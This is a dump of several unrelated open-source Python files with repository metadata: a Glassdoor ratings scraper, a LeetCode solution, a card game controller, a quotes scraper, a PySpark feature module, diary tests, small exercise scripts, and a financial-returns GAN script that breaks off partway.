response.meta['year']\n company = response.meta['company']\n website = response.meta['website']\n location = response.meta['location']\n employee_count = response.meta['employee_count']\n founded = response.meta['founded']\n cotype = response.meta['cotype']\n ticker = response.meta['ticker']\n industry = response.meta['industry']\n revenue = response.meta['revenue']\n\n interviewurl = response.xpath('//a[@class=\"eiCell cell interviews \"]/@href').extract_first()\n\n interview_url = 'https://www.glassdoor.com{}'.format(interviewurl)\n\n benefits_rating = response.xpath('//div[@class=\"ratingNum rating\"]/text()').extract_first() \n\n benefits_n_reviews = response.xpath('//div[@class=\"minor\"]/span/text()').extract_first()\n\n yield Request(url=interview_url, callback = self.parse_interview_page, dont_filter=True, meta = {'start_date': start_date, 'end_date':end_date, 'year':year, 'company':company,'website':website,'location':location,'employee_count':employee_count,'founded':founded,'cotype':cotype, 'ticker':ticker,'industry':industry, 'revenue':revenue,'benefits_rating':benefits_rating, 'benefits_n_reviews': benefits_n_reviews})\n\n def parse_interview_page(self,response):\n start_date = response.meta['start_date']\n end_date = response.meta['end_date']\n year = response.meta['year']\n company = response.meta['company']\n website = response.meta['website']\n location = response.meta['location']\n employee_count = response.meta['employee_count']\n founded = response.meta['founded']\n cotype = response.meta['cotype']\n ticker = response.meta['ticker']\n industry = response.meta['industry']\n revenue = response.meta['revenue']\n benefits_rating = response.meta['benefits_rating']\n benefits_n_reviews = response.meta['benefits_n_reviews']\n\n reviewsurl = response.xpath('//a[@class=\"eiCell cell reviews \"]/@href').extract_first() \n\n reviews_url = 'https://www.glassdoor.com{}'.format(reviewsurl)\n\n interview_difficulty = response.xpath('//div[@class=\"difficultyLabel subtle\"]/text()').extract_first()\n\n interview_n_reviews = re.findall('\\d+', response.xpath('//div[@class=\"cell chartWrapper experience\"]/h3/span/text()').extract_first())\n\n positive_xp = response.xpath('//div[@class=\"cell chartWrapper experience\"]/div/div/div[2]/div/div[2]/div[2]/span/text()').extract_first()\n\n neutral_xp = response.xpath('//div[@class=\"cell chartWrapper experience\"]/div/div/div[2]/div/div[3]/div[2]/span/text()').extract_first()\n\n negative_xp = response.xpath('//div[@class=\"cell chartWrapper experience\"]/div/div/div[2]/div/div[4]/div[2]/span/text()').extract_first()\n\n yield Request(url=reviews_url, callback = self.parse_reviews_page, dont_filter=True, meta = {'start_date': start_date, 'end_date':end_date, 'year':year, 'company':company,'website':website,'location':location,'employee_count':employee_count,'founded':founded,'cotype':cotype, 'ticker':ticker,'industry':industry, 'revenue':revenue,'benefits_rating':benefits_rating, 'benefits_n_reviews': benefits_n_reviews, 'interview_difficulty':interview_difficulty, 'interview_n_reviews':interview_n_reviews, 'positive_xp':positive_xp, 'neutral_xp':neutral_xp, 'negative_xp':negative_xp})\n\n def parse_reviews_page(self,response):\n start_date = response.meta['start_date']\n end_date = response.meta['end_date']\n year = response.meta['year']\n company = response.meta['company']\n website = response.meta['website']\n location = response.meta['location']\n employee_count = response.meta['employee_count']\n founded = response.meta['founded']\n 
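# note: these scraped fields are threaded from callback to callback via response.meta; Scrapy's cb_kwargs would be a tidier hand-off for the same purpose.\n        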
cotype = response.meta['cotype']\n ticker = response.meta['ticker']\n industry = response.meta['industry']\n revenue = response.meta['revenue']\n benefits_rating = response.meta['benefits_rating']\n benefits_n_reviews = response.meta['benefits_n_reviews']\n interview_difficulty = response.meta['interview_difficulty']\n interview_n_reviews = response.meta['interview_n_reviews']\n positive_xp = response.meta['positive_xp']\n neutral_xp = response.meta['neutral_xp']\n negative_xp = response.meta['negative_xp']\n \n\n culture_score = response.xpath('//div[@class=\"common__EIReviewsRatingsStyles__ratingNum mb-sm mb-md-0\"]/text()').extract_first()\n\n recommendation = response.xpath('//tspan[@class=\"donut__DonutStyle__donutchart_text_val\"]/text()').extract()[0]\n\n try:\n ceo_score = response.xpath('//tspan[@class=\"donut__DonutStyle__donutchart_text_val\"]/text()').extract()[1]\n except:\n ceo_score = ''\n\n number_reviews = response.xpath('//div[@class=\"common__EIReviewSortBarStyles__sortsHeader row justify-content-between mt-md-xl mt-sm\"]/h2/span/strong/text()').extract_first()\n\n reviews = response.xpath('//p[@class=\"common__EIReviewHighlightsStyles__highlightText my-0\"]/span//text()').extract()\n\n reviews = re.sub('\\(([^\\)]+)\\)',',,,', str(reviews)).split(',,,')\n\n reviewspro = (' '.join(re.findall('\\w+', reviews[0]))) + ' '+ (' '.join(re.findall('\\w+', reviews[1])))\n\n reviewscon = (' '.join(re.findall('\\w+', reviews[2]))) + ' '+ (' '.join(re.findall('\\w+', reviews[3])))\n\n review_item = GlassdoorItem()\n review_item['reviewspro'] = reviewspro\n review_item['reviewscon'] = reviewscon\n review_item['number_reviews'] = number_reviews\n review_item['recommendation'] = recommendation\n review_item['ceo_score'] = ceo_score\n review_item['culture_score'] = culture_score\n review_item['positive_xp'] = positive_xp\n review_item['neutral_xp'] = neutral_xp\n review_item['negative_xp'] = negative_xp\n review_item['interview_difficulty'] = interview_difficulty\n review_item['interview_n_reviews'] = interview_n_reviews\n review_item['benefits_n_reviews'] = benefits_n_reviews\n review_item['benefits_rating'] = benefits_rating\n review_item['year'] = year\n review_item['start_date'] = start_date\n review_item['end_date'] = end_date\n review_item['company'] = company\n review_item['website'] = website\n review_item['location'] = location\n review_item['employee_count'] = employee_count\n review_item['founded'] = founded\n review_item['cotype'] = cotype\n review_item['ticker'] = ticker\n review_item['industry'] = industry\n review_item['revenue'] = revenue\n\n yield review_item\n\n\n\n\n","repo_name":"chosus/glassdoor","sub_path":"scrapy_csv_files/glassdoor_best_places_to_work/glassdoor/spiders/glassdoor_spider.py","file_name":"glassdoor_spider.py","file_ext":"py","file_size_in_byte":10068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37285685008","text":"#\n# @lc app=leetcode id=524 lang=python3\n#\n# [524] Longest Word in Dictionary through Deleting\n#\n# https://leetcode.com/problems/longest-word-in-dictionary-through-deleting/description/\n#\n# algorithms\n# Medium (46.10%)\n# Likes: 348\n# Dislikes: 183\n# Total Accepted: 46.3K\n# Total Submissions: 100.2K\n# Testcase Example: '\"abpcplea\"\\n[\"ale\",\"apple\",\"monkey\",\"plea\"]'\n#\n# \n# Given a string and a string dictionary, find the longest string in the\n# dictionary that can be formed by deleting some characters of the given\n# string. 
If there are more than one possible result, return the longest word\n# with the smallest lexicographical order. If there is no possible result,\n# return the empty string.\n# \n# Example 1:\n# \n# Input:\n# s = \"abpcplea\", d = [\"ale\",\"apple\",\"monkey\",\"plea\"]\n# \n# Output: \n# \"apple\"\n# \n# \n# \n# \n# Example 2:\n# \n# Input:\n# s = \"abpcplea\", d = [\"a\",\"b\",\"c\"]\n# \n# Output: \n# \"a\"\n# \n# \n# \n# Note:\n# \n# All the strings in the input will only contain lower-case letters.\n# The size of the dictionary won't exceed 1,000.\n# The length of all the strings in the input won't exceed 1,000.\n# \n# \n#\nfrom typing import List  # needed when running outside the LeetCode judge\n\n\nclass Solution:\n    def issubsequence(self, x, y):\n        # returns True when x is a subsequence of y\n        if not x:\n            return True\n        j = 0\n        for i in range(len(y)):\n            if x[j] == y[i]:\n                j += 1\n            if j == len(x):\n                break\n        return j == len(x)\n\n\n    def findLongestWord(self, s: str, d: List[str]) -> str:\n        # max_str = \"\"\n        # for str in d:\n        #     if self.issubsequence(str, s):\n        #         if len(str) > len(max_str) or (len(str) == len(max_str) and str < max_str):\n        #             max_str = str\n\n        #     return max_str\n\n        for word in sorted(d, key=lambda w: (-len(w), w)):\n            it = iter(s)\n            if all(c in it for c in word): return word\n        return \"\"\n\n    \n\n","repo_name":"chenxu0602/LeetCode","sub_path":"524.longest-word-in-dictionary-through-deleting.py","file_name":"524.longest-word-in-dictionary-through-deleting.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"7657462888","text":"from element import *\n\nclass Game():\n    def __init__(self):\n        self.operation = [] # every object that has been clicked\n        self.cards_used = [] # cards already used this turn\n        self.permitted_operation = [] # objects that may be clicked\n        self.origin_discard = 0 # flag: does the player still need to discard?\n        self.discard = 0 # discard flag that is updated dynamically\n        self.step = 1 # operation step count\n        self.now = 0 # player whose turn it is\n        self.leave = False # flag: has the game ended?\n        self.camp = [\"The former\", \"The latter\"]\n        self.OK = \"OK\"\n        self.CANCEL = \"cancel\"\n        self.END = \"end\"\n    \n    def setPermittedOperation(self): # set the objects that may be clicked\n        global players\n        self.permitted_operation.clear()\n        for card in players[self.now].cards:\n            if card.usable(self.cards_used):\n                self.permitted_operation.append(card)\n        for chess in players[self.now].chesses:\n            if chess.can_use_skill != 0 and chess.imprisoned == 0:\n                self.permitted_operation.append(chess)\n        for button in players[self.now].battle_buttons:\n            if button.available == True:\n                self.permitted_operation.append(button)\n        self.permitted_operation.append(\"end\")\n\n    def initialize(self, board): # game initialization\n        global players\n        self.board = board\n        boardInitialize(board)\n        players[self.now].dropCards(2)\n        chesses_list0 = (players[0].chesses[0], players[1].chesses[0])\n        chesses_list1 = (players[0].chesses[1], players[1].chesses[1])\n        chesses_list2 = (players[0].chesses[2], players[1].chesses[2])\n        chesses_list3 = (players[0].chesses[3], players[1].chesses[3])\n        chesses_list4 = (players[0].chesses[4], players[1].chesses[4])\n        chesses_list5 = (players[0].chesses[5], players[1].chesses[5])\n        chesses_list6 = (players[0].chesses[6], players[1].chesses[6])\n        chesses_list7 = (players[0].chesses[7], players[1].chesses[7])\n        chesses_list = (chesses_list0, chesses_list1, chesses_list2, chesses_list3, chesses_list4, chesses_list5, chesses_list6, chesses_list7)\n        self.board.hud.initialize_chesses(chesses_list)\n        self.setPermittedOperation()\n        for card in players[self.now].cards:\n            self.board.hud.display_card(card)\n        for button in players[self.now].battle_buttons:\n            self.board.hud.display_battle_button(button)\n
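        # note: only the active player's hand and buttons are rendered; the opponent's hand is exposed to the HUD just as a count below.\n        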
self.board.hud.set_enemy_cards_num(len(players[1-self.now].cards))\n        self.board.hud.set_clickable(self.permitted_operation)\n        self.board.hud.refresh_chesses_states()\n\n    def roundEnd(self): # actions performed at the end of each turn\n        global players, battles\n        players[0].chessChange()\n        players[1].chessChange()\n        for chess in players[self.now].chesses:\n            if chess.position == list(self.board.map.origin[1-self.now]):\n                self.leave = True\n                self.board.hud.print(self.camp[self.now] + \" win!\")\n                self.board.hud.set_clickable([self.END])\n                return\n        for card in players[self.now].cards:\n            self.board.hud.remove_card(card)\n        for button in players[self.now].battle_buttons: \n            self.board.hud.remove_battle_button(button)\n        for battle in battles:\n            battle.settle()\n        self.cards_used.clear()\n        self.operation.clear()\n        setNow(1-self.now)\n        self.now = 1-self.now\n        players[self.now].dropCards(2)\n        self.setPermittedOperation()\n        self.board.hud.switch_chesses()\n        self.board.hud.refresh_chesses_states()\n        for card in players[self.now].cards:\n            self.board.hud.display_card(card)\n        for button in players[self.now].battle_buttons:\n            self.board.hud.display_battle_button(button)\n        self.board.hud.set_enemy_cards_num(len(players[1-self.now].cards))\n        self.board.hud.set_clickable(self.permitted_operation)\n\n    def click(self, obj): # handle the operation for the clicked object\n        global players, card_library\n        if obj not in self.permitted_operation:\n            self.board.hud.set_clickable(self.permitted_operation)\n            return\n        if obj == self.END:\n            if self.leave == True:\n                self.board.leave()\n                return\n            self.discard = len(players[self.now].cards) - 5 # the hand may hold at most 5 cards\n            self.discard = 0 if self.discard < 0 else self.discard\n            self.origin_discard = self.discard\n            if self.discard == 0:\n                self.roundEnd()\n            else:\n                self.permitted_operation = players[self.now].cards[:]\n                self.board.hud.set_clickable(self.permitted_operation)\n        elif obj == self.CANCEL:\n            self.step = 1\n            self.operation.clear()\n            if self.origin_discard == 0:\n                self.setPermittedOperation()\n            else:\n                self.permitted_operation = players[self.now].cards[:]\n                self.discard = self.origin_discard\n            self.board.hud.set_clickable(self.permitted_operation)\n        elif obj == self.OK:\n            if self.operation[0].__class__.__bases__[0].__name__ == \"Card\":\n                if self.origin_discard == 0:\n                    players[self.now].cards.remove(self.operation[0])\n                    card_library.discard.append(self.operation[0]) \n                    self.board.hud.remove_card(self.operation[0])\n                    use_card_str = self.camp[self.now]+\" use \" + self.operation[0].__class__.__name__ +'('+str(self.operation[0].point)+')'\n                    for ope in self.operation[1:]:\n                        use_card_str += (\", target is \" + ope.__class__.__name__)\n                    self.board.hud.print(use_card_str)\n                    for chess in players[self.now].chesses:\n                        chess.timeUseCard(self.operation[0], self.cards_used)\n                    self.cards_used.append(self.operation[0])\n                    self.operation[0].skill(self.operation[1:]) \n                else:\n                    discard_card_str = self.camp[self.now] + \" discard \"\n                    for card in self.operation:\n                        players[self.now].cards.remove(card)\n                        card_library.discard.append(card)\n                        self.board.hud.remove_card(card)\n                    self.discard = 0\n                    self.origin_discard = 0\n                    discard_card_str += (card.__class__.__name__ + ' ')\n                    self.board.hud.print(discard_card_str)\n                    self.roundEnd()\n            elif self.operation[0].__class__.__bases__[0].__name__ == \"Chess\":\n                if self.operation[0].can_use_skill > 0:\n                    self.operation[0].can_use_skill -= 1\n                use_chess_str = self.camp[self.now]+\" use \" +self.operation[0].__class__.__name__ + \"'s skill\"\n                for ope in self.operation[1:]:\n                    use_chess_str += (\", target is \" +
ope.__class__.__name__)\n                self.board.hud.print(use_chess_str)\n                self.operation[0].skill(self.operation[1:], self.cards_used)\n            elif self.operation[0].__class__.__name__ == \"Button\":\n                players[self.now].cards.remove(self.operation[1])\n                self.board.hud.remove_card(self.operation[1])\n                self.board.hud.print(self.camp[self.now] + \" put a battle card\")\n                self.operation[0].skill(self.operation[1:])\n            self.step = 1\n            self.operation.clear()\n            self.setPermittedOperation()\n            self.board.hud.set_clickable(self.permitted_operation)\n            self.board.hud.refresh_chesses_states()\n            self.board.hud.clear_selection()\n        else:\n            self.operation.append(obj)\n            if self.operation[0].__class__.__bases__[0].__name__ == \"Card\":\n                if self.discard == 0:\n                    self.permitted_operation = self.operation[0].needOperation(self.step)\n                else:\n                    self.discard -= 1\n                    if self.discard == 0:\n                        self.permitted_operation = [\"cancel\", \"OK\"]\n                    else:\n                        self.permitted_operation.clear()\n                        for card in players[self.now].cards:\n                            if card not in self.operation:\n                                self.permitted_operation.append(card)\n                        self.permitted_operation.append(\"cancel\")\n                    if self.discard == 0:\n                        self.permitted_operation.append(\"cancel\")\n            elif self.operation[0].__class__.__bases__[0].__name__ == \"Chess\":\n                self.permitted_operation = self.operation[0].needOperation(self.operation, self.step)\n            elif self.operation[0].__class__.__name__ == \"Button\":\n                self.permitted_operation = self.operation[0].needOperation(self.step)\n            self.step += 1\n            self.board.hud.set_clickable(self.permitted_operation)","repo_name":"GeoffreYu/Versus","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6854931066","text":"import os\nimport ast\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef scrap_quotes(url=\"\"):\n    domain = \"https://quotes.toscrape.com\"\n    req = requests.get(f\"{domain}{url}\")\n    soup = BeautifulSoup(req.text, \"html.parser\")\n\n    quotes = []\n    quotes_tags = soup.select(\"div.quote\")\n    for quote_tag in quotes_tags:\n        quote = {}\n        quote['text'] = quote_tag.select(\"span.text\")[0].getText()\n        quote['author'] = quote_tag.select(\"small.author\")[0].getText()\n        quote['tags'] = []\n        for tag in quote_tag.select(\"div.tags a.tag\"):\n            quote['tags'].append(tag.getText())\n        quotes.append(quote)\n\n    next_url = None\n    link_tag = soup.select(\"li.next a\")\n    if len(link_tag) > 0:\n        next_url = link_tag[0]['href']\n\n    print(f\"Página {domain}{url}, {len(quotes)} citas scrapeadas.\")\n\n    return quotes, next_url\n\n\ndef scrap_site(limit=2):\n    all_quotes = []\n    next_url = \"\"\n    while 1:\n        quotes, next_url = scrap_quotes(next_url)\n        all_quotes += quotes\n        limit -= 1\n        if limit == 0 or next_url is None:\n            return all_quotes\n\n\nclass Citas:\n    quotes = []\n\n    if os.path.exists(\"quotes.csv\"):\n        with open(\"quotes.csv\", \"r\") as file:\n            data = csv.DictReader(file)\n            for quote in data:\n                quote['tags'] = ast.literal_eval(quote['tags'])  # safer than eval() for parsing the stored list\n                quotes.append(quote)\n\n    @staticmethod\n    def scrapear():\n        Citas.quotes = scrap_site(limit=99)  # <--- VERY LARGE LIMIT\n        with open(\"quotes.csv\", \"w\") as file:\n            writer = csv.DictWriter(\n                file, fieldnames=[\"text\", \"author\", \"tags\"])\n            writer.writeheader()\n            for quote in Citas.quotes:\n                writer.writerow(quote)\n\n    @staticmethod\n    def listar(limite=10):\n        for quote in Citas.quotes[:limite]:\n            print(quote[\"text\"])\n            print(quote[\"author\"])\n            for tag in quote[\"tags\"]:\n                print(tag, end=\" \")\n            print(\"\\n\")\n\n
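    # note: quotes.csv doubles as a simple cache; the class body loads it at import time and scrapear() refreshes it on demand.\n\n    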
@staticmethod\n def etiqueta(nombre=\"\"):\n for quote in Citas.quotes:\n if nombre in quote[\"tags\"]:\n print(quote[\"text\"])\n print(quote[\"author\"])\n for tag in quote[\"tags\"]:\n print(tag, end=\" \")\n print(\"\\n\")\n\n @staticmethod\n def autor(nombre=\"\"):\n for quote in Citas.quotes:\n if nombre == quote[\"author\"]:\n print(quote[\"text\"])\n print(quote[\"author\"])\n for tag in quote[\"tags\"]:\n print(tag, end=\" \")\n print(\"\\n\")\n","repo_name":"JesusMirandaEspino/API-phyton-curso","sub_path":"finalscraping.py","file_name":"finalscraping.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73950171685","text":"from typing import Dict, List, Iterable\nfrom functools import reduce\nfrom pyspark.sql import SparkSession, DataFrame, functions as f\nfrom pyspark.sql.window import Window\nfrom odap.common.dataframes import create_dataframe\n\nfrom odap.common.logger import logger\nfrom odap.common.config import TIMESTAMP_COLUMN\n\nfrom odap.feature_factory import const\nfrom odap.feature_factory.config import (\n Config,\n)\nfrom odap.feature_factory.dq_checks import execute_soda_checks_from_feature_notebooks\nfrom odap.feature_factory.feature_notebook import FeatureNotebookList\nfrom odap.feature_factory.metadata_schema import get_metadata_schema\n\n\ndef join_dataframes(dataframes: List[DataFrame], join_columns: List[str]) -> DataFrame:\n dataframes = [df.na.drop(how=\"any\", subset=join_columns) for df in dataframes]\n window = Window.partitionBy(*join_columns).rowsBetween(Window.unboundedPreceding, Window.unboundedFollowing)\n union_df = reduce(lambda df1, df2: df1.unionByName(df2, allowMissingColumns=True), dataframes)\n columns = [col for col in union_df.columns if col not in join_columns]\n\n logger.info(f\"Joining {len(dataframes)} dataframes...\")\n joined_df = (\n union_df.select(\n *join_columns,\n *[f.first(column, ignorenulls=True).over(window).alias(column) for column in columns],\n )\n .groupBy(join_columns)\n .agg(*[f.first(column).alias(column) for column in columns])\n )\n logger.info(\"Join successful.\")\n\n return joined_df\n\n\ndef get_all_feature_tables(config: Config) -> Iterable[str]:\n spark = SparkSession.getActiveSession()\n metadata_table = config.get_metadata_table()\n return {row.table for row in spark.table(metadata_table).select(const.TABLE).collect()}\n\n\ndef create_metadata_df(feature_notebooks: FeatureNotebookList) -> DataFrame:\n features_metadata = []\n for notebook in feature_notebooks:\n features_metadata.extend(notebook.metadata)\n\n return create_dataframe(features_metadata, get_metadata_schema())\n\n\ndef fill_nulls_in_notebook(notebook: List[Dict]) -> Dict:\n fill_dict = {}\n\n for feature in notebook:\n if feature[const.FILLNA_VALUE_TYPE] == \"NoneType\":\n continue\n if feature[const.DTYPE].startswith(\"array\"):\n continue\n\n fill_dict[feature[const.FEATURE]] = feature[const.FILLNA_VALUE]\n return fill_dict\n\n\ndef fill_array_nulls(df: DataFrame, notebook: List[Dict]) -> DataFrame:\n for feature in notebook:\n if feature[const.DTYPE].startswith(\"array\") and feature[const.FILLNA_VALUE] is not None:\n df = df.withColumn(\n feature[const.FEATURE],\n f.when(\n f.col(feature[const.FEATURE]).isNull(), f.array(*map(f.lit, feature[const.FILLNA_VALUE]))\n ).otherwise(f.col(feature[const.FEATURE])),\n )\n return df\n\n\ndef fill_nulls(df: DataFrame, feature_notebooks: FeatureNotebookList) -> DataFrame:\n metadata = 
[notebook.metadata for notebook in feature_notebooks]\n fill_dict = {}\n\n for notebook in metadata:\n notebook_dict = fill_nulls_in_notebook(notebook)\n fill_dict.update(notebook_dict)\n\n for notebook in metadata:\n df = fill_array_nulls(df, notebook)\n\n return df.fillna(fill_dict)\n\n\ndef create_features_df(feature_notebooks: FeatureNotebookList, entity_primary_key: str) -> DataFrame:\n joined_df = join_dataframes(\n dataframes=[notebook.df for notebook in feature_notebooks], join_columns=[entity_primary_key, TIMESTAMP_COLUMN]\n )\n\n filled_df = fill_nulls(joined_df, feature_notebooks)\n\n execute_soda_checks_from_feature_notebooks(df=filled_df, feature_notebooks=feature_notebooks)\n\n return filled_df\n","repo_name":"DataSentics/odap","sub_path":"odap-package/src/odap/feature_factory/dataframes/dataframe_creator.py","file_name":"dataframe_creator.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1279104361","text":"from lib.diary import *\nfrom lib.diary_entry import *\n\n\"\"\"\nGiven several diary entries\ncan return a list of entries\n\"\"\"\ndef test_returns_list_after_several_diary_entries():\n entry_1 = DiaryEntry('Title 1', 'This is the first entry of the diary.')\n entry_2 = DiaryEntry('Title 2', 'This is the second entry in the diary.')\n diary = Diary()\n diary.add(entry_1)\n diary.add(entry_2)\n assert diary.all() == ['Title 1', 'Title 2']\n\n\n\"\"\"\nWith several entries in list\nCan return total word count of entries\n\"\"\"\ndef test_returns_total_word_count_of_entries():\n entry_1 = DiaryEntry('Title 1', 'This is the first entry of the diary.')\n entry_2 = DiaryEntry('Title 2', 'This is the second entry in the diary.')\n diary = Diary()\n diary.add(entry_1)\n diary.add(entry_2)\n assert diary.count_words() == 20\n\n\n\"\"\"\nWith several entries in list\nCan give an estimate of reading time in minutes for entire diary\n\"\"\"\ndef test_returns_estimate_of_reading_time():\n entry_1 = DiaryEntry('Title 1', 'This is the first entry of the diary.')\n entry_2 = DiaryEntry('Title 2', 'This is the second entry in the diary.')\n diary = Diary()\n diary.add(entry_1)\n diary.add(entry_2)\n assert diary.reading_time(10) == 2\n\n\n\"\"\"\nGiven a reading speed and an amount of time\nCan return appropriate entries to be read in that time\n\"\"\"\ndef test_selects_appropriate_entries_for_reading_speed_and_time():\n entry_1 = DiaryEntry('Title 1', 'This is the first entry of the diary.')\n entry_2 = DiaryEntry('Title 2', 'This is the second entry in the diary. Some extra words.')\n entry_3 = DiaryEntry('Title 3', 'This is the third diary entry. It is longer and cannot be read as fast as the first two.')\n diary = Diary()\n diary.add(entry_1)\n diary.add(entry_2)\n diary.add(entry_3)\n assert diary.find_best_entry_for_reading_time(15, 1) == {'Title 2' : 'This is the second entry in the diary. 
Some extra words.'}","repo_name":"MartyPru/golden_square_skill_challenges","sub_path":"tests/test_diary_and_diary_entry_integration.py","file_name":"test_diary_and_diary_entry_integration.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73656774566","text":"def find(text):\n    words = text.split()\n    ch = 0\n    digit = 0\n    symb = 0\n    for char in text:\n        if char.islower() or char.isupper():\n            ch+=1\n        elif char.isnumeric():\n            digit+=1\n        else:\n            symb+=1\n    print(\"char: \",ch,\"\\ndigit: \",digit,\"\\nsymbols: \",symb)\ntext = input(\"Enter your string\\t\")\nfind(text)\n","repo_name":"alwinmreji/ROS-and-ML","sub_path":"Assingment_#2/#6_count_all_seperatly.py","file_name":"#6_count_all_seperatly.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28384988885","text":"# Hide and Seek 3 (Baekjoon 13549): 0-1 BFS, since doubling costs 0 and stepping costs 1\nfrom collections import deque\nn,k = map(int,input().split())\nMAX = 100001\nvisited = [False] * MAX\n\nqueue = deque([(0,n)])\n\nwhile queue:\n    count, cur_pos = queue.popleft()\n    if cur_pos == k:\n        result = count\n        break\n    visited[cur_pos] = True\n    \n    cases = [(count,cur_pos*2),(count+1,cur_pos-1),(count+1,cur_pos+1)]\n    \n    for i in range(len(cases)):\n        if cases[i][1] >=0 and cases[i][1]<=MAX-1 and not visited[cases[i][1]]:\n            if i == 0:\n                queue.appendleft((cases[i][0],cases[i][1]))\n            else:\n                queue.append((cases[i][0],cases[i][1]))\n\nprint(result)","repo_name":"bottle-honey/baekjoon","sub_path":"BFS/13549.py","file_name":"13549.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11951283931","text":"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jul 15 10:58:15 2019\r\n\r\n@author: rochej\r\n\"\"\"\r\n'CGAN with a non-categorical condition (a list): paper 1, with z-score scaling'\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport statsmodels\r\nimport statsmodels.api as sm\r\n\r\nimport keras.backend as K\r\n\r\nfrom keras.datasets import mnist\r\nfrom keras.layers.merge import _Merge\r\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout, LSTM, multiply, concatenate\r\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D, Embedding\r\nfrom keras.layers.advanced_activations import LeakyReLU\r\nfrom keras.layers.convolutional import Conv1D,UpSampling1D\r\nfrom keras.models import Sequential, Model\r\nfrom keras.optimizers import RMSprop\r\nfrom functools import partial\r\n\r\nfrom scipy import stats\r\n\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n# parameters\r\nz_size=100\r\nlabel_size=1\r\nn_critic = 5\r\n\r\nepoch=20\r\noptimizer = RMSprop(lr=0.00005)\r\n\r\n\r\n\r\n\r\n#num_classes=43\r\n\r\n\r\n# read the data\r\nret_data_ini = pd.read_csv(filepath_or_buffer=\"ret_data.csv\")\r\n\r\ndf=pd.read_excel('VIX.xlsx',index_col='Date')\r\ndft=df.T\r\ndf_vol=df['VIX']\r\ndf_sp=df['SPX 500']\r\n\r\ndef get_return(Y):\r\n    R = Y.pct_change()[1:]\r\n    return(R)\r\n    \r\ndef get_norm(data):\r\n    mu=data.mean()\r\n    sig=data.std()\r\n    return((data-mu)/sig)\r\n    \r\n\r\ndef split(X,w,roll_w,label_w):\r\n    \r\n    Xn=X.copy()\r\n    Xn=np.array(Xn)\r\n    \r\n    label=[]\r\n    L=[]\r\n    for k in range(label_w,len(X),roll_w):\r\n        if k+w num_train - batch_size:\r\n#                start = 0\r\n#        if e % 10 == 0:\r\n##
print(d_loss[-1],d_loss[0],d_loss[1])\r\n#            print(e)\r\n##            print('epoch: {}; D loss: {:.4}; G_loss: {:.4}'.format(e, d_loss[-1], g_loss))\r\n        \r\n    \r\n    \r\ndef train(X):\r\n    num_train = X.shape[0]\r\n    start = label_w\r\n    E=[]\r\n\r\n# matching labels needed to compute the cross-entropy\r\n    valid = np.ones((batch_size, 1))\r\n    fake = np.zeros((batch_size, 1))\r\n\r\n    for e in range(epoch):\r\n        for _ in range(n_critic):\r\n            stop = start + batch_size\r\n            real_batch = X[start:stop]\r\n            label_batch=[]\r\n            for k in range(start,stop):\r\n                label=X[k-label_w:k] # window of the previous n days\r\n                label_batch.append(label)\r\n            label_batch=np.array(label_batch)\r\n            \r\n            real_batch=np.array(real_batch)\r\n            label_batch=np.array(label_batch)\r\n            label_batch=label_batch.reshape(batch_size,label_w)\r\n\r\n            \r\n            real_batch=real_batch.reshape((real_batch.shape[0],real_batch.shape[1]))\r\n            noise =np.random.normal(0, 0.5, size=(batch_size, z_size))\r\n\r\n            \r\n            d_loss_real = discriminator.train_on_batch([real_batch, label_batch], valid) #input: real data\r\n            gen_imgs = generator.predict([noise, label_batch])\r\n            d_loss_fake = discriminator.train_on_batch([gen_imgs, label_batch], fake) #input: fake data\r\n##            \r\n            d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)\r\n##            \r\n        g_loss = combined.train_on_batch([noise, label_batch], valid)\r\n        start += batch_size\r\n        if start > num_train - batch_size:\r\n            start = label_w\r\n        if e % 10 == 0:\r\n#            print(d_loss[-1],d_loss[0],d_loss[1])\r\n            E.append(d_loss)\r\n            print('d_loss_tot=',d_loss)\r\n            print('fake=',d_loss_fake)\r\n            print('real=',d_loss_real)\r\n            print(e)\r\n            \r\n#        if e % 400 == 0 and e>0:\r\n#            label_t=label_r[0].reshape(-1,1)\r\n#            n_gene=1\r\n#            noise_t =np.random.normal(0, 0.1, size=(n_gene,z_size))\r\n##noise_t=np.array([1 for i in range(100)]).reshape(1,100)\r\n##noise_t=ret_real.iloc[:100]\r\n##noise_t=np.array(noise_t).reshape(1,len(noise_t))\r\n#\r\n#            ret_gene=generator.predict([noise_t,label_t])\r\n#            ret_gene=pd.DataFrame(ret_gene).T\r\n#            price_gene=get_price(ret_gene,label_t)\r\n#            plt.plot(price_gene,label=str(e))\r\n    \r\n    \r\n\r\n'simple model'\r\ndiscriminator =build_discriminator()\r\n#discriminator.compile(loss=['binary_crossentropy'], optimizer=optimizer, metrics=['accuracy'])\r\ndiscriminator.compile(loss=['binary_crossentropy'], optimizer=optimizer)\r\ngenerator = build_generator()\r\n##\r\nlabel = Input(shape=(label_size,))\r\nnoise = Input(shape=(z_size, ))\r\n##\r\nnoise_gen = 